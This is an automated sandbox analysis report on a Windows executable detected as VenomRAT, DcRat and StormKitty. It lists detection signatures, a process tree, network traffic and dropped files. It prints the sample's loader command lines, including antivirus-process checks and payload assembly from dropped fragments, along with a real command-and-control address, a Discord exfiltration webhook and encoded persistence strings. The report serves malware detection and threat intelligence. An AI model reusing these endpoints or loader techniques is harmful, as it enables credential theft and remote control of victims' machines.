Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
OR8Ti8rf8h.exe

Overview

General Information

Sample name:OR8Ti8rf8h.exe
renamed because original name is a hash value
Original sample name:af9cd831104a7d0a352cd88f77a4cfbdde43804b5225002fc7115685d2c6297f.exe
Analysis ID:1573646
MD5:6681713c421e1b4951d5a08c39f43e97
SHA1:23c09997b6cac46683950dbbefa18d65b3250d12
SHA256:af9cd831104a7d0a352cd88f77a4cfbdde43804b5225002fc7115685d2c6297f
Tags:exepdfviewfilesmetascan-comuser-JAMESWT_MHT
Infos:

Detection

AveMaria, DcRat, StormKitty, VenomRAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Search for Antivirus process
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected AveMaria stealer
Yara detected BrowserPasswordDump
Yara detected DcRat
Yara detected Powershell download and execute
Yara detected StormKitty Stealer
Yara detected VenomRAT
AI detected suspicious sample
Drops PE files with a suspicious file extension
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Writes many files with high entropy
Writes to foreign memory regions
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Potentially Suspicious Execution Of Regasm/Regsvcs From Uncommon Location
Sigma detected: Suspicious Copy From or To System Directory
Uses 32bit PE files
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • OR8Ti8rf8h.exe (PID: 8024 cmdline: "C:\Users\user\Desktop\OR8Ti8rf8h.exe" MD5: 6681713C421E1B4951D5A08C39F43E97)
    • cmd.exe (PID: 8144 cmdline: "C:\Windows\System32\cmd.exe" /c copy Frames Frames.cmd && Frames.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 8152 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • tasklist.exe (PID: 7196 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 7236 cmdline: findstr /I "wrsa opssvc" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • tasklist.exe (PID: 7368 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 7396 cmdline: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 7516 cmdline: cmd /c md 585711 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • findstr.exe (PID: 7592 cmdline: findstr /V "ComplyFailuresGuardsDomInvolvementRadarScreensKidney" Tonight MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 7588 cmdline: cmd /c copy /b ..\Solaris + ..\Harassment + ..\Proudly + ..\Turned + ..\Viruses + ..\Wallpapers + ..\Usc + ..\Crm + ..\Ribbon + ..\Confident + ..\Angle + ..\Alumni + ..\Fees + ..\Reserve + ..\Reflected + ..\Include + ..\Specialist + ..\Respondent + ..\False + ..\Assume + ..\Regardless + ..\Mary + ..\Consecutive + ..\Movers + ..\Scottish + ..\Holocaust + ..\Experience + ..\Phrase + ..\Started + ..\Disturbed + ..\Needle + ..\Pipes + ..\Hollow + ..\Spelling + ..\Reed + ..\Tft + ..\Specialties Y MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Depression.com (PID: 5428 cmdline: Depression.com Y MD5: 62D09F076E6E0240548C2F837536A46A)
        • RegAsm.exe (PID: 6180 cmdline: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exe MD5: 0D5DF43AF2916F47D00C1573797C1A13)
      • choice.exe (PID: 6800 cmdline: choice /d y /t 5 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Ave Maria, AveMariaRAT, avemariaInformation stealer which uses AutoIT for wrapping.
  • Anunak
https://malpedia.caad.fkie.fraunhofer.de/details/win.ave_maria
NameDescriptionAttributionBlogpost URLsLink
DCRatDCRat is a typical RAT that has been around since at least June 2019.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat
NameDescriptionAttributionBlogpost URLsLink
Cameleon, StormKittyPWC describes this malware as a backdoor, capable of file management, upload and download of files, and execution of commands.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cameleon

Malware Configuration

Threatname: VenomRAT

{"Server": "208.115.220.58", "Port": "4449", "Version": "RAT + hVNC  6.0.5", "MutexName": "mrpejlowfvqhtkxwj", "Autorun": "false", "Group": "false"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000E.00000002.2630405640.00000000035F2000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DcRat_2Yara detected DcRatJoe Security
    0000000E.00000002.2629293985.0000000001172000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_VenomRATYara detected VenomRATJoe Security
      0000000E.00000002.2629293985.0000000001172000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_StormKittyYara detected StormKitty StealerJoe Security
        0000000E.00000002.2629293985.0000000001172000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          0000000E.00000002.2629293985.0000000001172000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_BrowserPasswordDump_1Yara detected BrowserPasswordDumpJoe Security
            Click to see the 12 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            14.2.RegAsm.exe.1295b8a.1.raw.unpackJoeSecurity_VenomRATYara detected VenomRATJoe Security
              14.2.RegAsm.exe.1295b8a.1.raw.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                14.2.RegAsm.exe.1295b8a.1.raw.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
                  14.2.RegAsm.exe.1295b8a.1.raw.unpackJoeSecurity_BrowserPasswordDump_1Yara detected BrowserPasswordDumpJoe Security
                    14.2.RegAsm.exe.1295b8a.1.raw.unpackWindows_Trojan_DCRat_1aeea1acunknownunknown
                    • 0x11d67e:$a1: havecamera
                    • 0x1684a8:$a2: timeout 3 > NUL
                    • 0x16b82b:$a3: START "" "
                    • 0x16bd40:$a3: START "" "
                    • 0x16bc1b:$a4: L2Mgc2NodGFza3MgL2NyZWF0ZSAvZiAvc2Mgb25sb2dvbiAvcmwgaGlnaGVzdCAvdG4g
                    • 0x16bcb8:$a5: U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA==
                    Click to see the 19 entries

                    Sigma Signatures

                    System Summary

                    barindex
                    Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments
                    Source: Process startedAuthor: Oleg Kolesnikov @securonix invrep_de, oscd.community, Florian Roth (Nextron Systems), Christian Burkard (Nextron Systems): Data: Command: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exe, CommandLine: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exe, ParentCommandLine: Depression.com Y, ParentImage: C:\Users\user\AppData\Local\Temp\585711\Depression.com, ParentProcessId: 5428, ParentProcessName: Depression.com, ProcessCommandLine: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exe, ProcessId: 6180, ProcessName: RegAsm.exe
                    Sigma detected: Potentially Suspicious Execution Of Regasm/Regsvcs From Uncommon Location
                    Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exe, CommandLine: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exe, ParentCommandLine: Depression.com Y, ParentImage: C:\Users\user\AppData\Local\Temp\585711\Depression.com, ParentProcessId: 5428, ParentProcessName: Depression.com, ProcessCommandLine: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exe, ProcessId: 6180, ProcessName: RegAsm.exe
                    Sigma detected: Suspicious Copy From or To System Directory
                    Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c copy Frames Frames.cmd && Frames.cmd, CommandLine: "C:\Windows\System32\cmd.exe" /c copy Frames Frames.cmd && Frames.cmd, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\OR8Ti8rf8h.exe", ParentImage: C:\Users\user\Desktop\OR8Ti8rf8h.exe, ParentProcessId: 8024, ParentProcessName: OR8Ti8rf8h.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c copy Frames Frames.cmd && Frames.cmd, ProcessId: 8144, ProcessName: cmd.exe

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Sigma detected: Search for Antivirus process
                    Source: Process startedAuthor: Joe Security: Data: Command: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c copy Frames Frames.cmd && Frames.cmd, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 8144, ParentProcessName: cmd.exe, ProcessCommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , ProcessId: 7396, ProcessName: findstr.exe

                    Suricata Signatures

                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-12-12T12:39:15.665492+010028424781Malware Command and Control Activity Detected208.115.220.584449192.168.2.749843TCP

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Found malware configuration
                    Source: 0000000E.00000002.2630405640.0000000003421000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: VenomRAT {"Server": "208.115.220.58", "Port": "4449", "Version": "RAT + hVNC 6.0.5", "MutexName": "mrpejlowfvqhtkxwj", "Autorun": "false", "Group": "false"}
                    Multi AV Scanner detection for submitted file
                    Source: OR8Ti8rf8h.exeReversingLabs: Detection: 21%
                    Yara detected AveMaria stealer
                    Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 6180, type: MEMORYSTR
                    AI detected suspicious sample
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 92.0% probability
                    Source: OR8Ti8rf8h.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: OR8Ti8rf8h.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: Binary string: D:\Backup\Venom RAT + HVNC Finally Released 11.30.2024\HVNCDll\obj\Release\hvnc.pdbP source: RegAsm.exe, 0000000E.00000002.2629293985.0000000001172000.00000040.00000400.00020000.00000000.sdmp
                    Source: Binary string: RegAsm.pdb source: RegAsm.exe, 0000000E.00000000.1908601175.0000000000D92000.00000002.00000001.01000000.00000008.sdmp, RegAsm.exe.11.dr
                    Source: Binary string: RegAsm.pdb4 source: RegAsm.exe, 0000000E.00000000.1908601175.0000000000D92000.00000002.00000001.01000000.00000008.sdmp, RegAsm.exe.11.dr
                    Source: Binary string: D:\Backup\Venom RAT + HVNC Finally Released 11.30.2024\HVNCDll\obj\Release\hvnc.pdb source: RegAsm.exe, 0000000E.00000002.2629293985.0000000001172000.00000040.00000400.00020000.00000000.sdmp
                    Source: C:\Users\user\Desktop\OR8Ti8rf8h.exeCode function: 0_2_00406301 FindFirstFileW,FindClose,0_2_00406301
                    Source: C:\Users\user\Desktop\OR8Ti8rf8h.exeCode function: 0_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406CC7
                    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user~1\Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user~1\AppData\Local\Temp\585711Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user~1\AppData\Local\Temp\585711\Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user~1\AppData\Local\Temp\Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user~1\AppData\Local\Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user~1\AppData\Jump to behavior

                    Networking

                    barindex
                    Suricata IDS alerts for network traffic
                    Source: Network trafficSuricata IDS: 2842478 - Severity 1 - ETPRO JA3 Hash - Suspected ASYNCRAT Server Cert (ja3s) : 208.115.220.58:4449 -> 192.168.2.7:49843
                    Yara detected Generic Downloader
                    Source: Yara matchFile source: 14.2.RegAsm.exe.1295b8a.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 14.2.RegAsm.exe.1170000.0.unpack, type: UNPACKEDPE
                    Source: global trafficTCP traffic: 192.168.2.7:49843 -> 208.115.220.58:4449
                    Source: Joe Sandbox ViewASN Name: LIMESTONENETWORKSUS LIMESTONENETWORKSUS
                    Source: unknownTCP traffic detected without corresponding DNS query: 208.115.220.58
                    Source: unknownTCP traffic detected without corresponding DNS query: 208.115.220.58
                    Source: unknownTCP traffic detected without corresponding DNS query: 208.115.220.58
                    Source: unknownTCP traffic detected without corresponding DNS query: 208.115.220.58
                    Source: unknownTCP traffic detected without corresponding DNS query: 208.115.220.58
                    Source: unknownTCP traffic detected without corresponding DNS query: 208.115.220.58
                    Source: unknownTCP traffic detected without corresponding DNS query: 208.115.220.58
                    Source: unknownTCP traffic detected without corresponding DNS query: 208.115.220.58
                    Source: unknownTCP traffic detected without corresponding DNS query: 208.115.220.58
                    Source: unknownTCP traffic detected without corresponding DNS query: 208.115.220.58
                    Source: unknownTCP traffic detected without corresponding DNS query: 208.115.220.58
                    Source: unknownTCP traffic detected without corresponding DNS query: 208.115.220.58
                    Source: unknownTCP traffic detected without corresponding DNS query: 208.115.220.58
                    Source: unknownTCP traffic detected without corresponding DNS query: 208.115.220.58
                    Source: unknownTCP traffic detected without corresponding DNS query: 208.115.220.58
                    Source: unknownTCP traffic detected without corresponding DNS query: 208.115.220.58
                    Source: unknownTCP traffic detected without corresponding DNS query: 208.115.220.58
                    Source: unknownTCP traffic detected without corresponding DNS query: 208.115.220.58
                    Source: unknownTCP traffic detected without corresponding DNS query: 208.115.220.58
                    Source: unknownTCP traffic detected without corresponding DNS query: 208.115.220.58
                    Source: unknownTCP traffic detected without corresponding DNS query: 208.115.220.58
                    Source: unknownTCP traffic detected without corresponding DNS query: 208.115.220.58
                    Source: unknownTCP traffic detected without corresponding DNS query: 208.115.220.58
                    Source: unknownTCP traffic detected without corresponding DNS query: 208.115.220.58
                    Source: unknownTCP traffic detected without corresponding DNS query: 208.115.220.58
                    Source: unknownTCP traffic detected without corresponding DNS query: 208.115.220.58
                    Source: unknownTCP traffic detected without corresponding DNS query: 208.115.220.58
                    Source: unknownTCP traffic detected without corresponding DNS query: 208.115.220.58
                    Source: unknownTCP traffic detected without corresponding DNS query: 208.115.220.58
                    Source: unknownTCP traffic detected without corresponding DNS query: 208.115.220.58
                    Source: unknownTCP traffic detected without corresponding DNS query: 208.115.220.58
                    Source: unknownTCP traffic detected without corresponding DNS query: 208.115.220.58
                    Source: unknownTCP traffic detected without corresponding DNS query: 208.115.220.58
                    Source: unknownTCP traffic detected without corresponding DNS query: 208.115.220.58
                    Source: unknownTCP traffic detected without corresponding DNS query: 208.115.220.58
                    Source: unknownTCP traffic detected without corresponding DNS query: 208.115.220.58
                    Source: unknownTCP traffic detected without corresponding DNS query: 208.115.220.58
                    Source: unknownTCP traffic detected without corresponding DNS query: 208.115.220.58
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: global trafficDNS traffic detected: DNS query: time.windows.com
                    Source: global trafficDNS traffic detected: DNS query: iLAKhXCSlkKKBvjaNGAojhxfYe.iLAKhXCSlkKKBvjaNGAojhxfYe
                    Source: OR8Ti8rf8h.exeString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
                    Source: RegAsm.exe, 0000000E.00000002.2633955559.0000000005930000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
                    Source: Depression.com.2.dr, Ada.0.drString found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
                    Source: Depression.com.2.dr, Ada.0.drString found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
                    Source: Depression.com.2.dr, Ada.0.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
                    Source: Depression.com.2.dr, Ada.0.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
                    Source: Depression.com.2.dr, Ada.0.drString found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
                    Source: OR8Ti8rf8h.exeString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0
                    Source: OR8Ti8rf8h.exeString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
                    Source: OR8Ti8rf8h.exeString found in binary or memory: http://crl.sectigo.com/SectigoPublicTimeStampingCAR36.crl0z
                    Source: OR8Ti8rf8h.exeString found in binary or memory: http://crl.sectigo.com/SectigoPublicTimeStampingRootR46.crl0
                    Source: OR8Ti8rf8h.exeString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#
                    Source: OR8Ti8rf8h.exeString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
                    Source: OR8Ti8rf8h.exeString found in binary or memory: http://crt.sectigo.com/SectigoPublicTimeStampingCAR36.crt0#
                    Source: OR8Ti8rf8h.exeString found in binary or memory: http://crt.sectigo.com/SectigoPublicTimeStampingRootR46.p7c0#
                    Source: RegAsm.exe, 0000000E.00000002.2629872593.0000000001807000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
                    Source: RegAsm.exe, 0000000E.00000002.2633955559.0000000005930000.00000004.00000020.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F80085060.14.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
                    Source: RegAsm.exe, 0000000E.00000002.2629293985.0000000001172000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://ipinfo.io/ip
                    Source: RegAsm.exe, 0000000E.00000002.2629293985.0000000001172000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://james.newtonking.com/projects/json
                    Source: OR8Ti8rf8h.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
                    Source: OR8Ti8rf8h.exeString found in binary or memory: http://ocsp.comodoca.com0
                    Source: Depression.com.2.dr, Ada.0.drString found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
                    Source: OR8Ti8rf8h.exeString found in binary or memory: http://ocsp.sectigo.com0
                    Source: OR8Ti8rf8h.exeString found in binary or memory: http://ocsp.sectigo.com0D
                    Source: Depression.com.2.dr, Ada.0.drString found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
                    Source: Depression.com.2.dr, Ada.0.drString found in binary or memory: http://ocsp2.globalsign.com/rootr306
                    Source: Depression.com.2.dr, Ada.0.drString found in binary or memory: http://ocsp2.globalsign.com/rootr606
                    Source: RegAsm.exe, 0000000E.00000002.2630405640.0000000003421000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: Depression.com.2.dr, Ada.0.drString found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
                    Source: Depression.com.2.dr, Ada.0.drString found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
                    Source: Depression.com, 0000000B.00000000.1425868665.00000000010D5000.00000002.00000001.01000000.00000007.sdmp, Managed.0.dr, Depression.com.2.drString found in binary or memory: http://www.autoitscript.com/autoit3/X
                    Source: RegAsm.exe, 0000000E.00000002.2629293985.0000000001172000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://www.newtonsoft.com/jsonschema
                    Source: OR8Ti8rf8h.exeString found in binary or memory: http://www.softland.ro0/
                    Source: RegAsm.exe, 0000000E.00000002.2629293985.0000000001172000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/webhooks/1016614786533969920/fMJOOjA1pZqjV8_s0JC86KN9Fa0FeGPEHaEak8WTADC18s5
                    Source: RegAsm.exe, 0000000E.00000002.2629293985.0000000001172000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://discordapp.com/api/v6/users/
                    Source: RegAsm.exe, 0000000E.00000002.2629293985.0000000001172000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://github.com/LimerBoy/StormKitty
                    Source: OR8Ti8rf8h.exeString found in binary or memory: https://sectigo.com/CPS0
                    Source: RegAsm.exe, 0000000E.00000002.2629293985.0000000001172000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
                    Source: RegAsm.exe, 0000000E.00000002.2629293985.0000000001172000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354cIt
                    Source: RegAsm.exe, 0000000E.00000002.2629293985.0000000001172000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354
                    Source: RegAsm.exe, 0000000E.00000002.2629293985.0000000001172000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://urn.to/r/sds_see
                    Source: RegAsm.exe, 0000000E.00000002.2629293985.0000000001172000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://urn.to/r/sds_seeaCould
                    Source: Depression.com.2.dr, Ada.0.drString found in binary or memory: https://www.autoitscript.com/autoit3/
                    Source: Ada.0.drString found in binary or memory: https://www.globalsign.com/repository/0

                    Key, Mouse, Clipboard, Microphone and Screen Capturing

                    barindex
                    Yara detected VenomRAT
                    Source: Yara matchFile source: 14.2.RegAsm.exe.1295b8a.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 14.2.RegAsm.exe.1170000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000E.00000002.2629293985.0000000001172000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 6180, type: MEMORYSTR
                    Source: C:\Users\user\Desktop\OR8Ti8rf8h.exeCode function: 0_2_004050F9 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004050F9
                    Source: C:\Users\user\Desktop\OR8Ti8rf8h.exeCode function: 0_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004044D1

                    E-Banking Fraud

                    barindex
                    Yara detected AveMaria stealer
                    Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 6180, type: MEMORYSTR

                    Spam, unwanted Advertisements and Ransom Demands

                    barindex
                    Writes many files with high entropy
                    Source: C:\Users\user\Desktop\OR8Ti8rf8h.exeFile created: C:\Users\user\AppData\Local\Temp\Viruses entropy: 7.99822982573Jump to dropped file
                    Source: C:\Users\user\Desktop\OR8Ti8rf8h.exeFile created: C:\Users\user\AppData\Local\Temp\False entropy: 7.99689272878Jump to dropped file
                    Source: C:\Users\user\Desktop\OR8Ti8rf8h.exeFile created: C:\Users\user\AppData\Local\Temp\Regardless entropy: 7.99715475135Jump to dropped file
                    Source: C:\Users\user\Desktop\OR8Ti8rf8h.exeFile created: C:\Users\user\AppData\Local\Temp\Phrase entropy: 7.99741027527Jump to dropped file
                    Source: C:\Users\user\Desktop\OR8Ti8rf8h.exeFile created: C:\Users\user\AppData\Local\Temp\Proudly entropy: 7.99707385539Jump to dropped file
                    Source: C:\Users\user\Desktop\OR8Ti8rf8h.exeFile created: C:\Users\user\AppData\Local\Temp\Experience entropy: 7.9972652898Jump to dropped file
                    Source: C:\Users\user\Desktop\OR8Ti8rf8h.exeFile created: C:\Users\user\AppData\Local\Temp\Reserve entropy: 7.99724135879Jump to dropped file
                    Source: C:\Users\user\Desktop\OR8Ti8rf8h.exeFile created: C:\Users\user\AppData\Local\Temp\Needle entropy: 7.99777189205Jump to dropped file
                    Source: C:\Users\user\Desktop\OR8Ti8rf8h.exeFile created: C:\Users\user\AppData\Local\Temp\Mary entropy: 7.99775540186Jump to dropped file
                    Source: C:\Users\user\Desktop\OR8Ti8rf8h.exeFile created: C:\Users\user\AppData\Local\Temp\Disturbed entropy: 7.99676919368Jump to dropped file
                    Source: C:\Users\user\Desktop\OR8Ti8rf8h.exeFile created: C:\Users\user\AppData\Local\Temp\Turned entropy: 7.99721220613Jump to dropped file
                    Source: C:\Users\user\Desktop\OR8Ti8rf8h.exeFile created: C:\Users\user\AppData\Local\Temp\Solaris entropy: 7.99769657464Jump to dropped file
                    Source: C:\Users\user\Desktop\OR8Ti8rf8h.exeFile created: C:\Users\user\AppData\Local\Temp\Consecutive entropy: 7.99685491078Jump to dropped file
                    Source: C:\Users\user\Desktop\OR8Ti8rf8h.exeFile created: C:\Users\user\AppData\Local\Temp\Confident entropy: 7.99774835652Jump to dropped file
                    Source: C:\Users\user\Desktop\OR8Ti8rf8h.exeFile created: C:\Users\user\AppData\Local\Temp\Pipes entropy: 7.99732276667Jump to dropped file
                    Source: C:\Users\user\Desktop\OR8Ti8rf8h.exeFile created: C:\Users\user\AppData\Local\Temp\Fees entropy: 7.99803927966Jump to dropped file
                    Source: C:\Users\user\Desktop\OR8Ti8rf8h.exeFile created: C:\Users\user\AppData\Local\Temp\Movers entropy: 7.9975454896Jump to dropped file
                    Source: C:\Users\user\Desktop\OR8Ti8rf8h.exeFile created: C:\Users\user\AppData\Local\Temp\Ribbon entropy: 7.99772369059Jump to dropped file
                    Source: C:\Users\user\Desktop\OR8Ti8rf8h.exeFile created: C:\Users\user\AppData\Local\Temp\Include entropy: 7.99824280401Jump to dropped file
                    Source: C:\Users\user\Desktop\OR8Ti8rf8h.exeFile created: C:\Users\user\AppData\Local\Temp\Reed entropy: 7.9970905642Jump to dropped file
                    Source: C:\Users\user\Desktop\OR8Ti8rf8h.exeFile created: C:\Users\user\AppData\Local\Temp\Alumni entropy: 7.99782896822Jump to dropped file
